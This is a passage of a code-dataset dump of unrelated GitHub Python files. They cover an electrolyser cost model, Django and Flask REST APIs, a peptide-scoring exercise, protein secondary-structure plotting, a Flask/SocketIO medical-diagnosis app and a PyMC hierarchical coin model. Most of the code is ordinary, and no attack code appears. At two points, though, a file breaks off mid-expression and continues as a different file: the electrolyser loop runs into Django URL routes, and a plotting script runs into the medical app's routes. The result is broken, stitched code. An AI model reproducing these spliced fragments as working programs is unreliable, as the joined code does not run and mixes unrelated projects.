results\n\n","repo_name":"crameth/dag_api_experiment","sub_path":"theme_pipeline.py","file_name":"theme_pipeline.py","file_ext":"py","file_size_in_byte":6007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70682614173","text":"'''\nCreated on: 20211018\n\nAuthor: Yi Zheng, Department of Electrical Engineering, DTU\n\n'''\nfrom advanced_eletrolyser_model import *\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef grid_connected(unit_capex_ele = 700, capacity_factor = 0.95, figure = False, country = 'DK1', ele_cs = 2):\n    # Read the 2020 day-ahead market electricity prices for the given country\n    ele_price_df = pd.read_csv('./Inputdata/elspot_2020.csv')\n    ele_price_se = ele_price_df[country]\n    ele_price_ls = [1.16*i for i in ele_price_se.tolist()] # $\n\n    # Define an objective capacity factor\n    cf = capacity_factor\n\n    #-------------------------Find the cut-off price-------------------------Start\n    # Sort the price\n    ele_price_ls.sort()\n    # Cut-off price\n    COP = ele_price_ls[int(ele_price_ls.__len__()*cf)-1]\n    print(COP)\n    if figure:\n        fig, ax = plt.subplots()\n        ax.plot(range(ele_price_ls.__len__()), ele_price_ls)\n        ax.set_xlabel('Time(s)')\n        ax.set_ylabel('Price($/MWh)')\n        ax.axvline(x = cf * 366*24, ymin= 0.1, ymax= 0.9, color = 'red')\n        ax.axhline(y = COP, xmin=0, xmax= 1, linestyle = 'dashed')\n    #-------------------------Find the cut-off price-------------------------End\n\n    # Instantiate an electrolyser\n    ael = AEL_system(T = 90, P= 30, capacity= 1, unit_capex= unit_capex_ele, om_fixed_factor= 0.03, lifetime= 20,\n                     cold_start_time= ele_cs, working_range= (0.1, 1),\n                     nom_hydronge_con_rate=48.65, half_h2_con_rate= 45.5, quarter_h2_con_rate= 43.14)\n\n    # Convert the original electricity price data to US dollars\n    ele_price_ls = [1.16*i for i in ele_price_se.tolist()]\n    time_horizon = range(ele_price_ls.__len__())\n\n    for h in time_horizon:\n        # If the price is above the COP, shut down; if it is below the COP, produce hydrogen at full power\n        if ele_price_ls[h] >= COP:\n            ael.shut_down()\n        if ael.state == 0 and ele_price_ls[h]', DetailUser.as_view(), name='profile'),\n    path('login', views.obtain_auth_token),\n    path('signup', SignUp.as_view(), name=\"signup\"),\n\n    path('products', ProductList.as_view(), name='products'),\n    path('products/<int:pk>', ProductDetail.as_view(), name='product'),\n    path('products/<int:pk>/order', CreateOrder.as_view(), name='order'),\n]\n","repo_name":"acferten/rest","sub_path":"mysite/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33323338620","text":"#peptide = 'NQEL'\npeptide = 'FNSQGKPRALMGIYGCNMPLDLGKATRQQFLEPDRLCHFSMKQKC'\n#spectrum = [0,99,113,114,128,227,257,299,355,356,370,371,484]\nspectrum = open('dataset_4913_1.txt','r').read().strip().split()\nspectrum = [int(x) for x in spectrum]\nspectrum.sort()\n\namino_acid_mass = {'G':57,'A':71,'S':87,'P':97,'V':99,'T':101,'C':103,'I':113,'L':113,\n                   'N':114,'D':115,'K':128,'Q':128,'E':129,'M':131,'H':137,'F':147,\n                   'R':156,'Y':163,'W':186}\n\ndef linear_spectrum(peptide, amino_acid_mass):\n    prefix_mass = [0]\n    for i in range(len(peptide)):\n        amino = peptide[i]\n        amino_mass = amino_acid_mass[amino]\n        prefix_mass.append(prefix_mass[i] + amino_mass)\n\n    linear_spectrum = [0]\n    for i in range(len(peptide)):\n        for j in range(i+1, len(peptide)+1):\n            linear_spectrum.append(prefix_mass[j] - prefix_mass[i])\n\n    linear_spectrum.sort()\n    return linear_spectrum\n\ndef linear_scoring(peptide, spectrum):\n    theory_spectrum = linear_spectrum(peptide, amino_acid_mass)\n    score = 0\n    for i in 
theory_spectrum:\n        if i in spectrum:\n            score += 1\n            spectrum.remove(i)\n\n    return score\n\nprint(linear_scoring(peptide, spectrum))\n\n","repo_name":"maqueredkop/Bioinformatics_Specialization_Coursea_Exercise","sub_path":"bioinfo_sec2/week4/No2_linear_scoring.py","file_name":"No2_linear_scoring.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34765781179","text":"from flask import Flask, render_template, request, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\n\napp = Flask(__name__)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\nCORS(app)\n\n# FIXME: Include User model to a file or folder called models\nclass User(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    username = db.Column(db.String(80))\n    email = db.Column(db.String(200))\n\n    def __init__(self, username, email):\n        self.username = username\n        self.email = email\n\n    def __repr__(self):\n        return '<User %r>' % self.username\n    \n    def serialize(self):\n        return {\n            \"id\":self.id,\n            \"username\":self.username, \n            \"email\":self.email\n        }\n\nwith app.app_context():\n    db.drop_all()\n    db.create_all()\n\n    db.session.add(User('admin', 'admin@garatzailea.com'))\n    db.session.add(User('guest', 'guest@garatzailea.com'))\n    db.session.commit()\n\n    users = User.query.all()\n    print(users)\n\n@app.route('/')\ndef index():\n    # GET status\n    return jsonify({ \"message\":\"pong\"})\n\n@app.route('/users', methods=['GET'])\ndef allusers():\n    # GET all data from database & sort by id\n    data = User.query.order_by(User.id).all()\n    return jsonify({\"users\":[auser.serialize() for auser in data]})\n\n@app.route('/users/<id>', methods=['GET'])\ndef oneuser(id):\n    auser = User.query.get(id)\n    return jsonify(auser.serialize())\n\n@app.route('/users', methods=['POST'])\ndef createusers():\n    # POST a data to database\n    body = request.json\n    if not( 'username' in body):\n        return jsonify({\"error\": \"username not found\"})\n    if not( 'email' in body):\n        return jsonify({\"error\": \"email not found\"})\n    \n    name = body['username']\n    email = body['email']\n    auser = User(name, email)\n    db.session.add(auser)\n    db.session.commit()\n\n    return jsonify({\"message\": \"success!\", \"data\":auser.serialize()})\n\n@app.route('/users/<id>', methods=['PUT'])\ndef updateuser(id):\n    auser = User.query.get(id)\n    body = request.json\n    if not(auser):\n        return jsonify({\"error\": f\"User {id} not found\"})\n    if not( 'username' in body):\n        return jsonify({\"error\": \"username not found\"})\n    if not( 'email' in body):\n        return jsonify({\"error\": \"email not found\"})\n\n    auser.username = body['username']\n    auser.email = body['email']\n    db.session.add(auser)\n    db.session.commit()\n    return jsonify({\"message\": \"success!\", \"data\":auser.serialize()})\n\n@app.route('/users/<id>', methods=['DELETE'])\ndef deleteuser(id):\n    auser = User.query.filter_by(id=id).first()\n    db.session.delete(auser)\n    db.session.commit()\n    return jsonify({'status': 'user '+id+' has been deleted'})\n\nif __name__ == '__main__':\n    app.run()","repo_name":"japeto/simple-api-crud","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6844692329","text":"from flask import Flask, render_template\nfrom flask_restful import Api\nfrom resourses.restaurant import RestaurantList, Restaurant, TraditionalRestaurants\nfrom 
resourses.index import IndexRepr\nfrom resourses.wine import Wine, RandomWine\nfrom resourses.cocktail import CocktailsOfTheDay\nfrom resourses.dish import Dish, RandomDishFromMeal, LunchDishes, DinnerDishes, RandomDishes\nfrom resourses.breakfast import Breakfast\n\n\napp = Flask(__name__, static_folder='site')\napi = Api(app)\n\n\n@app.route('/')\ndef home():\n    return render_template('index.html')\n\napi.add_resource(IndexRepr, '/main')\napi.add_resource(RestaurantList, '/restaurants')\napi.add_resource(Restaurant, '/restaurant/')\napi.add_resource(TraditionalRestaurants, '/traditional_restaurants')\napi.add_resource(Wine, '/wine/')\napi.add_resource(RandomWine, '/wine')\napi.add_resource(CocktailsOfTheDay, '//cocktails')\napi.add_resource(Dish, '/dish/')\napi.add_resource(RandomDishFromMeal, '///')\napi.add_resource(RandomDishes, '//dishes')\napi.add_resource(Breakfast, '//breakfast')\napi.add_resource(LunchDishes, '//lunch')\napi.add_resource(DinnerDishes, '//dinner/')\n\n\n@app.after_request\ndef add_cors_headers(response):\n    response.headers.add('Access-Control-Allow-Origin', '*')\n    response.headers.add('Access-Control-Allow-Methods', 'GET') # POST, OPTIONS, PUT, DELETE')\n    return response\n\nif __name__ == '__main__':\n    import init\n    app.run(port=5000, debug=True)\n","repo_name":"natakudm/menu_app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12082084489","text":"def fibonacci(n):\n    fib_list = [1, 1] # Initialize the Fibonacci sequence with the first two numbers, 1 and 1\n    while len(fib_list) < n:\n        next_number = fib_list[-1] + fib_list[-2] # Compute the next Fibonacci number\n        \n        fib_list.append(next_number)\n    return fib_list\n\n# Read a positive integer N from the user\nN = int(input(\"Enter a positive integer N: \"))\n\n# Print the first N Fibonacci numbers\nfib_sequence = fibonacci(N)\nprint(\"The first\", N, \"Fibonacci numbers are:\")\nfor num in fib_sequence:\n    print(num)\n\n","repo_name":"aerovfx/Fullstack4kid","sub_path":"CREATE_APP/Python/PythonChallenge/Level1/b7_fibonaciv2.py","file_name":"b7_fibonaciv2.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"vi","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"19107831960","text":"\"\"\"\nBernoulli Likelihood with Hierarchical Prior!\n\"\"\"\nimport numpy as np\nimport pymc3 as pm\nimport sys\nfrom scipy.stats import beta, binom\nimport matplotlib.pyplot as plt\n\n\n# Data for figure 9.11\nN = [10, 10, 10] # Number of flips per coin\nz = [5, 5, 5] # Number of heads per coin\n## Data for figure 9.12\n#N = [10, 10, 10] # Number of flips per coin\n#z = [1, 5, 9] # Number of heads per coin\n\n## Data for exercise 9.1\n#ncoins = 50\n#nflipspercoin = 5\n#mu_act = .7\n#kappa_act = 20\n#theta_act = beta.rvs(mu_act*kappa_act+1, (1-mu_act)*kappa_act+1, size=ncoins)\n#z = 
= line[42]\n# if pred=='H':\n# prediction+=[1]\n# elif pred=='E':\n# prediction+=[-1]\n# else:\n# prediction+=[0]\n# i+=1\n# print(seqid)\n# x = range(len(prediction))\n# beta = []\n# alpha = []\n# coil = []\n# for amino in prediction:\n# if amino == -1:\n# beta += [1]\n# alpha += [0]\n# coil += [0]\n# elif amino == 1:\n# beta += [0]\n# alpha += [1]\n# coil += [0]\n# else:\n# beta += [0]\n# alpha += [0]\n# coil += [1]\n# plt.scatter(x,beta,label='beta',marker = 'o',color='blue')\n# plt.scatter(x,coil,label='coil',marker='x', color='green')\n# plt.scatter(x,alpha,label='alpha',color='red')\n# plt.title('Secondary structure prediction s2D '+seqid)\n# plt.xlabel('Amino acid position')\n# plt.ylabel('Probability')\n# lgd = plt.legend(bbox_to_anchor=(1.05, 1), loc=2)\n# ax=plt.gca()\n# fig = plt.gcf()\n# fig.set_size_inches\n# ax.set_xlim([0,len(prediction)])\n# ax.set_ylim([0.9,1.1])\n# plt.savefig('../Data/S2D/'+seqid+'_actual.png',bbox_extra_artists=(lgd,),dpi=600,bbox_inches='tight')\n# plt.close() \n# s2D_predictions+=[[beta,coil,alpha]]\n# struct=struct[:len(prediction)]\n# acc=(np.array(prediction)==np.array(struct)).sum()/len(prediction)\n# s2D_accuracy+=acc\n# s2D_accuracies[seqid]=acc\n# \n# s2D_accuracy=s2D_accuracy/len(good_seqids)\n# print(\"accuracy s2D: \"+str(s2D_accuracy))\n# \n# \n# SOPM_accuracies = {}\n# SOPM_accuracy = 0\n# \n# j=-1\n# \n# SOPM_predictions=[]\n# for seqid in seqids:\n# j+=1\n# if seqid in good_seqids:\n# struct = structures[j]\n# prediction = []\n# for line in open('../Data/SOPM/'+seqid + '.sopm.txt'):\n# if line[0]in ['H','C','E'] and len(prediction)')\r\ndef custom_static(filename):\r\n return send_from_directory('static/js', filename, mimetype='text/javascript')\r\n\r\n\r\n@app.route(\"/\")\r\ndef login():\r\n \"\"\"\r\n Отображает страницу входа.\r\n :return: HTML-шаблон страницы входа.\r\n \"\"\"\r\n return render_template(\"login.html\")\r\n\r\n\r\n@app.route('/login', methods=['POST'])\r\ndef login_post():\r\n \"\"\"\r\n Обрабатывает данные, отправленные при попытке входа.\r\n :param str username: Имя пользователя, отправленное из формы входа.\r\n :param str password: Пароль, отправленный из формы входа.\r\n :return: Возвращает результат аутентификации.\r\n \"\"\"\r\n username = request.form['username']\r\n password = request.form['password']\r\n\r\n doctor = Doctor.get_by_username(username)\r\n authorized = doctor and check_password_hash(doctor.password_hash, password)\r\n \r\n if authorized:\r\n login_user(doctor)\r\n return jsonify({'success': True})\r\n else:\r\n return jsonify({'success': False})\r\n \r\n \r\n@app.route(\"/logout\")\r\n@login_required\r\ndef logout():\r\n \"\"\"\r\n Обрабатывает выход из аккаунта\r\n :return: Перенаправляет на страницу входа в аккаунт.\r\n \"\"\"\r\n logout_user()\r\n return redirect(url_for('login'))\r\n\r\n\r\n@app.route('/main')\r\n@login_required\r\ndef main():\r\n \"\"\"\r\n Отображает главную страницу с данными о пациентах и симптомах.\r\n :return: HTML-шаблон главной страницы.\r\n \"\"\"\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/patients')\r\n@login_required\r\ndef patients():\r\n \"\"\"\r\n Отображает страницу с пациентами.\r\n :return: HTML-шаблон страницы с пациентами.\r\n \"\"\"\r\n return render_template('patients.html')\r\n\r\n\r\n@app.route('/history')\r\n@login_required\r\ndef history():\r\n \"\"\"\r\n Отображает страницу с историей запросов.\r\n :return: HTML-шаблон страницы с историей запросов.\r\n \"\"\"\r\n return 
render_template('history.html')\r\n\r\n#---------------------------------------DONE-1--------------------------------------------\r\n@app.route('/get_request_info', methods=['POST'])\r\n@login_required\r\ndef get_request_info():\r\n \"\"\"\r\n Получает диагноз с помощью модели и возвращает информацию об этом запросе.\r\n :param str id: ID пациента.\r\n :param str name: Полное имя пациента.\r\n :param str oms: Полис ОМС пациента.\r\n :param list symptoms: Список симптомов.\r\n :return: JSON-ответ с информацией для карточки запроса, включая id запроса, имя пациента, имя доктора, симптомы, предсказанный диагноз, комментарии врачей.\r\n \"\"\"\r\n data = request.get_json()\r\n\r\n patient_id = data.get('id')\r\n patient_name = data.get('name')\r\n oms = data.get('oms')\r\n symptom_ids = data.get('symptoms')\r\n \r\n symptoms = [Symptom.get_by_id(id) for id in symptom_ids]\r\n \r\n request_id = Request.add(current_user.id, \r\n patient_id, \r\n [symptom.id for symptom in symptoms], #symptom_ids\r\n ML_MODEL_VERSION)\r\n\r\n disease_name = get_disease([symptom.name for symptom in symptoms])\r\n \r\n disease = Disease(None, None, None)\r\n \r\n if disease_name:\r\n status = 'READY'\r\n disease = Disease.get_by_name(disease_name)\r\n else:\r\n status = 'ERROR'\r\n \r\n Request.update_status(request_id, status, disease.id)\r\n doctor_comments = []\r\n \r\n response_data = ResponseData(\r\n id=request_id,\r\n patient_name=patient_name,\r\n doctor=current_user.name,\r\n symptoms=[symptom.ru_name for symptom in symptoms],\r\n diagnosis=disease.ru_name,\r\n doctor_comments=doctor_comments\r\n )\r\n \r\n return response_data.__dict__\r\n\r\n\r\n#------------------------------------------DONE-2----------------------------------------\r\n@app.route('/get_request_info_by_id', methods=['POST'])\r\n@login_required\r\ndef get_request_info_by_id():\r\n \"\"\"\r\n Получает возвращает информацию о запросе по его id из БД.\r\n :param str request_id: ID запроса.\r\n :return: JSON-ответ с информацией для карточки запроса, включая id запроса имя пациента, имя доктора, симптомы, предсказанный диагноз, комментарии врачей.\r\n \"\"\"\r\n data = request.get_json()\r\n\r\n request_id = data.get('request_id')\r\n\r\n symptoms = Request.get_symptom_ru_names(request_id)\r\n diagnosis_ru_name = Request.get_disease_ru_name(request_id)\r\n comments_values = Comment.get_comments_by_request_id(request_id, current_user.id)\r\n\r\n doctor_comments = [DoctorComment(id=comment_values[0],\r\n doctor=comment_values[1], \r\n time=comment_values[2].strftime(\"%Y-%m-%d %H:%M:%S\"),\r\n comment=comment_values[3], \r\n editable=comment_values[4]) for comment_values in comments_values]\r\n\r\n response_data = ResponseData(\r\n id=request_id,\r\n patient_name=Patient.get_name_by_request_id(request_id),\r\n doctor=current_user.name, \r\n symptoms=symptoms,\r\n diagnosis=diagnosis_ru_name,\r\n doctor_comments=doctor_comments\r\n )\r\n \r\n return response_data.__dict__\r\n\r\n\r\n#----------------------------------DONE-3---------------------------------------------------\r\n@app.route('/load_data_requests', methods=['GET'])\r\n@login_required\r\ndef load_data_requests():\r\n \"\"\"\r\n Получает список запросов для текущего пользователя для указанной страницы в пагинации с использованием поиска.\r\n :param str search: Фильтр.\r\n :param str page: Номер страницы.\r\n :return: JSON-ответ со списком запросов для указанной страницы, включая id запроса, имя пациента, дату, предсказанный диагноз, информацию о комментариях докторов(Без 
комментариев/Прокомментирован).\r\n \"\"\"\r\n term = request.args.get('search', '').lower()\r\n page = int(request.args.get('page', '1'))\r\n\r\n per_page = 100\r\n #limit = 25\r\n \r\n if (len(term) > 3):\r\n requests = Request.get_requests_page_by_doctor_id_contain_substr(current_user.id, per_page, term)\r\n else:\r\n requests = Request.get_requests_page_by_doctor_id(current_user.id, per_page)\r\n \r\n requests = [RequestData(id=request[0], name=request[1], date=request[2].strftime(\"%Y-%m-%d %H:%M:%S\"), diagnosis=request[3], is_commented=request[4]) for request in requests]\r\n\r\n return jsonify({'results': [request.__dict__ for request in requests], 'pagination': {'more': False }})\r\n\r\n\r\n@app.route('/get_patient_info', methods=['GET'])\r\n@login_required\r\ndef get_patient_info():\r\n \"\"\"\r\n Получает информацию о пациенте по его id.\r\n :param str patient_id: ID пациента.\r\n :return: JSON-ответ с информацией о пациенте, включая его id, полное имя, дату рождения, текущий возраст, Полис ОМС, пол.\r\n \"\"\"\r\n patient_id = request.args.get('patient_id')\r\n\r\n patient = Patient.get_by_id(patient_id)\r\n if not patient:\r\n error_message = {\"error\": \"Ошибка\", \"message\": \"Пациента не существует.\"}\r\n response = jsonify(error_message)\r\n response.status_code = 400\r\n return response\r\n \r\n today = datetime.now()\r\n age = today.year - patient.born_date.year - \\\r\n ((today.month, today.day) < (patient.born_date.month, patient.born_date.day))\r\n\r\n patient_data = PatientData(\r\n id=patient.id,\r\n name=patient.name,\r\n birthDate=patient.born_date.strftime(\"%Y-%m-%d\"),\r\n age=age, \r\n oms=patient.insurance_certificate,\r\n sex=patient.sex\r\n )\r\n\r\n photo_filename = f'./static/patient_images/{patient_id}.jpg'\r\n if os.path.exists(photo_filename):\r\n patient_data.photo_url = photo_filename\r\n\r\n return patient_data.__dict__\r\n\r\n#---------------------------------------DONE-4-------------------------------------------\r\n@app.route('/load_patient_history', methods=['GET'])\r\n@login_required\r\ndef load_patient_history():\r\n \"\"\"\r\n Получает список запросов для пациента по id пациента для указанной странице в пагинации.\r\n :param str patient_id: ID пациента.\r\n :param str page: Номер страницы.\r\n :return: JSON-ответ со списком запросов для указанной страницы, которые включают id запроса, имя доктора, предсказанный диагноз, информацию о комментариях докторов(Без комментариев/Прокомментирован).\r\n \"\"\"\r\n patient_id = request.args.get('search')\r\n if patient_id == '':\r\n return\r\n patient_id = int(patient_id)\r\n page = int(request.args.get('page', '1'))\r\n\r\n per_page = 100\r\n\r\n requests = Request.get_requests_page_by_patient_id(patient_id, per_page)\r\n requests = [RequestData(id=request[0], \r\n name=request[1], \r\n date=request[2].strftime(\"%Y-%m-%d %H:%M:%S\"), \r\n diagnosis=request[3], \r\n is_commented=request[4]) for request in requests]\r\n\r\n return jsonify({'results': [request.__dict__ for request in requests], 'pagination': {'more': False}})\r\n\r\n\r\n#---------------------------------------DONE-5-------------------------------------------\r\n@socketio.on('add_comment')\r\n@authenticated_only\r\ndef add_comment(data):\r\n \"\"\"\r\n Добавляет новый комментарий для указанного запроса в БД.\r\n :param str request_id: ID запроса.\r\n :param str comment: Текст комментария.\r\n :return: JSON-ответ с информацией о комментарии, включая id комментария, имя доктора, время, текст комментария, является ли текущий пользователь 
автором.\r\n \"\"\"\r\n room_id = data['room_id']\r\n request_id = data['request_id']\r\n comment_text = data['comment']\r\n \r\n user_id = current_user.id\r\n comment_id = Comment.add(user_id, request_id, comment_text)\r\n Request.update_is_commented(request_id, 1)\r\n comment = Comment.get_by_id(comment_id)\r\n if comment:\r\n response = CommentResponseData(id=comment.id, \r\n doctor=current_user.name, \r\n time=comment.date.strftime(\"%Y-%m-%d %H:%M:%S\"), \r\n comment=comment_text)\r\n else:\r\n response = CommentResponseData()\r\n\r\n if user_id in connected_users:\r\n for sid in connected_users[user_id]:\r\n emit('self_added_comment', response.__dict__, to = sid)\r\n emit('added_comment', response.__dict__, room = room_id, skip_sid = list(connected_users[user_id]))\r\n\r\n#---------------------------------------DONE-6-------------------------------------------\r\n@socketio.on('delete_comment')\r\n@authenticated_only\r\ndef delete_comment(data):\r\n \"\"\"\r\n Удаляет комментарий по его id.\r\n :param int comment_id: ID комментария.\r\n :return: JSON-ответ с id комментария и именем текущего пользователя.\r\n \"\"\"\r\n try:\r\n room_id = data['room_id']\r\n request_id = data['request_id']\r\n comment_id = data['comment_id']\r\n\r\n user_id = current_user.id\r\n if not Comment.validate_comment_author(comment_id, user_id):\r\n raise\r\n\r\n Comment.update_status_by_id('OLD', comment_id)\r\n is_commented = Comment.is_request_commented(request_id)\r\n #Request.update_is_commented(request_id, is_commented) #в бд на это есть триггер, можно убрать\r\n doctor_name = current_user.name\r\n\r\n response = CommentResponseData(id=comment_id, doctor=doctor_name)\r\n emit('deleted_comment', response.__dict__, room = room_id)\r\n except:\r\n emit('delete_comment_error')\r\n\r\n\r\n#---------------------------------------TODO-7-------------------------------------------\r\n@socketio.on('edit_comment')\r\n@authenticated_only\r\ndef edit_comment(data):\r\n \"\"\"\r\n Изменяет комментарий по его id.\r\n :param int comment_id: ID комментария.\r\n :param str comment: Текст комментария.\r\n :return: JSON-ответ с информацией о комментарии, включая id комментария, имя доктора, время, текст комментария, является ли текущий пользователь автором.\r\n \"\"\"\r\n try:\r\n room_id = data['room_id']\r\n request_id = data['request_id']\r\n comment_id = data['comment_id']\r\n updated_comment_text = data['comment']\r\n\r\n user_id = current_user.id\r\n if not Comment.validate_comment_author(comment_id, user_id):\r\n raise\r\n\r\n Comment.update_status_by_id('OLD', comment_id)\r\n new_comment_id = Comment.add(user_id, request_id, updated_comment_text)\r\n\r\n comment = Comment.get_by_id(new_comment_id)\r\n if comment:\r\n response = CommentResponseData(id=comment.id, \r\n old_id=comment_id, \r\n doctor=current_user.name, \r\n time=comment.date.strftime(\"%Y-%m-%d %H:%M:%S\"), \r\n comment=comment.comment)\r\n else:\r\n response = CommentResponseData()\r\n user_id = current_user.id\r\n if user_id in connected_users:\r\n for sid in connected_users[user_id]:\r\n emit('self_edited_comment', response.__dict__, to = sid)\r\n emit('edited_comment', response.__dict__, room = room_id, skip_sid = list(connected_users[user_id]))\r\n except:\r\n emit('edit_comment_error')\r\n\r\n@app.route('/create_patient', methods=['POST'])\r\n@login_required\r\ndef create_patient():\r\n \"\"\"\r\n Создает нового пациента.\r\n :param str fullname: Имя пациента.\r\n :param str birthdate: Дата рождения.\r\n :param str oms: Полис ОМС пациента.\r\n 
:param image image: Изображение пациента.\r\n :return: JSON-ответ с информацией о пациенте, включая id пациента, имя пациента, Полис ОМС.\r\n \"\"\"\r\n fullname = request.form['fullname']\r\n birthdate = request.form['birthdate']\r\n birthdate = datetime.strptime(birthdate, '%d.%m.%Y')\r\n oms = request.form['oms']\r\n sex = request.form['sex']\r\n image = request.files.get('image')\r\n\r\n Patient.insert_new_patient(fullname, oms, birthdate, sex)\r\n id = Patient.get_id_by_insurance_certificate(oms)\r\n patient_data = PatientData(id=id, name=fullname, oms=oms)\r\n\r\n directory_path = './static/patient_images/'\r\n\r\n if not os.path.exists(directory_path):\r\n os.makedirs(directory_path)\r\n\r\n if image:\r\n image.save(os.path.join(directory_path, f'{id}.jpg'))\r\n\r\n return patient_data.__dict__\r\n\r\n\r\n@app.route('/load_patients', methods=['GET'])\r\n@login_required\r\ndef load_patients():\r\n \"\"\"\r\n :param str search: Фильтр.\r\n :param str page: Номер страницы.\r\n :return: JSON-ответ со списком пациентов для указанной страницы, включая id пациента, имя, полис ОМС; также переменную more, указывающая о конце пагинации.\r\n \"\"\"\r\n term = request.args.get('search', '')\r\n page = int(request.args.get('page', 1))\r\n\r\n\r\n per_page = 100\r\n limit = 20\r\n \r\n if (len(term) > 3):\r\n patients = Patient.find_all_search_lazyload(term, per_page)\r\n else:\r\n patients = Patient.find_all_id_name_insurance_certificate(per_page)\r\n \r\n patients = [PatientData(id=patient[0], name=patient[1], oms=patient[2]) for patient in patients]\r\n\r\n return jsonify({'results': [patient.__dict__ for patient in patients], 'pagination': {'more': False}})\r\n\r\n@app.route('/load_symptoms', methods=['GET'])\r\n@login_required\r\ndef load_symptoms():\r\n \"\"\"\r\n :param str search: Фильтр.\r\n :param str page: Номер страницы.\r\n :return: JSON-ответ со списком симптомов для указанной страницы, включая id симптома, название, также переменную more, указывающая о конце пагинации.\r\n \"\"\"\r\n filter = request.args.get('search', '').lower()\r\n page = int(request.args.get('page', 1))\r\n\r\n per_page = 10\r\n\r\n symptoms = Symptom.find_all_symptoms()\r\n symptoms = [SymptomData(id=item[0], name=item[1].lower()) for item in symptoms]\r\n\r\n if filter != '':\r\n symptoms = [row for row in symptoms if filter in row.name]\r\n\r\n start = (page - 1) * per_page\r\n end = start + per_page\r\n filtered_data = symptoms[start:end]\r\n\r\n return jsonify({'results': [symptom.__dict__ for symptom in filtered_data], 'pagination': {'more': len(filtered_data) == per_page}})\r\n\r\nif __name__ == \"__main__\":\r\n socketio.run(app, debug=True)\r\n","repo_name":"schneider001/MedAssistant","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20149,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19107831960","text":"\"\"\"\nBernoulli Likelihood with Hierarchical Prior!\n\"\"\"\nimport numpy as np\nimport pymc3 as pm\nimport sys\nfrom scipy.stats import beta, binom\nimport matplotlib.pyplot as plt\n\n\n# Data for figure 9.11\nN = [10, 10, 10] # Number of flips per coin\nz = [5, 5, 5] # Number of heads per coin\n## Data for figure 9.12\n#N = [10, 10, 10] # Number of flips per coin\n#z = [1, 5, 9] # Number of heads per coin\n\n## Data for exercise 9.1\n#ncoins = 50\n#nflipspercoin = 5\n#mu_act = .7\n#kappa_act = 20\n#theta_act = beta.rvs(mu_act*kappa_act+1, (1-mu_act)*kappa_act+1, size=ncoins)\n#z = 
binom.rvs(n=nflipspercoin, p=theta_act, size=ncoins)\n#N = [nflipspercoin] * ncoins\n\n\n# Arrange the data into a more convenient way to feed the PyMC model.\ncoin = [] # list/vector index for each coins (from 0 to number of coins)\ny = [] # list/vector with head (1) or tails (0) for each flip.\nfor i, flips in enumerate(N):\n heads = z[i]\n if heads > flips:\n sys.exit(\"The number of heads can't be greater than the number of flips\")\n else:\n y = y + [1] * heads + [0] * (flips-heads)\n coin = coin + [i] * flips\n\n\n# Specify the model in PyMC\nwith pm.Model() as model:\n# define the hyperparameters\n mu = pm.Beta('mu', 2, 2)\n kappa = pm.Gamma('kappa', 1, 0.1)\n # define the prior\n theta = pm.Beta('theta', mu * kappa, (1 - mu) * kappa, shape=len(N))\n # define the likelihood\n y = pm.Bernoulli('y', p=theta[coin], observed=y)\n\n# Generate a MCMC chain\n step = pm.Metropolis()\n trace = pm.sample(5000, step, progressbar=False)\n# Restricted models like this could be difficult to sample. This is related \n# to the censoring comment in the book. One way to detect that something is \n# wrong with the sampling is to compare the autocorrelation plot and the \n# sampled values under different sampler, or you can try combinations of \n# sampler like this\n\n# step1 = pm.Metropolis([theta, mu])\n# step2 = pm.Slice([kappa])\n# trace = pm.sample(5000, [step1, step2], progressbar=False)\n\n# or this (this combination was used to generate the figures)\n\n# start = pm.find_MAP()\n# step1 = pm.Metropolis([theta, mu])\n# step2 = pm.NUTS([kappa])\n# trace = pm.sample(5000, [step1, step2], start=start, progressbar=False)\n\n## Check the results.\nburnin = 2000 # posterior samples to discard\n\n## Print summary for each trace\n#pm.df_summary(trace[burnin:])\n#pm.df_summary(trace)\n\n## Check for mixing and autocorrelation\npm.autocorrplot(trace[burnin:], varnames=['mu', 'kappa'])\n#pm.autocorrplot(trace, varnames =[mu, kappa])\n\n## Plot KDE and sampled values for each parameter.\npm.traceplot(trace[burnin:])\n#pm.traceplot(trace)\n\n# Create arrays with the posterior sample\ntheta1_sample = trace['theta'][:,0][burnin:]\ntheta2_sample = trace['theta'][:,1][burnin:]\ntheta3_sample = trace['theta'][:,2][burnin:]\nmu_sample = trace['mu'][burnin:]\nkappa_sample = trace['kappa'][burnin:]\n\n\n# Scatter plot hyper-parameters\nfig, ax = plt.subplots(4, 3, figsize=(12,12))\nax[0, 0].scatter(mu_sample, kappa_sample, marker='o', color='skyblue')\nax[0, 0].set_xlim(0,1)\nax[0, 0].set_xlabel(r'$\\mu$')\nax[0, 0].set_ylabel(r'$\\kappa$')\n\n# Plot mu histogram\n#plot_post(mu_sample, xlab=r'$\\mu$', show_mode=False, labelsize=9, framealpha=0.5)\n\npm.plot_posterior(mu_sample, ax=ax[0, 1], color='skyblue')\nax[0, 1].set_xlabel(r'$\\mu$')\nax[0, 1].set_xlim(0,1)\n\n# Plot kappa histogram\n#plot_post(kappa_sample, xlab=r'$\\kappa$', show_mode=False, labelsize=9, framealpha=0.5)\npm.plot_posterior(kappa_sample, ax=ax[0, 2], color='skyblue')\nax[0, 2].set_xlabel(r'$\\kappa$')\n\n# Plot theta 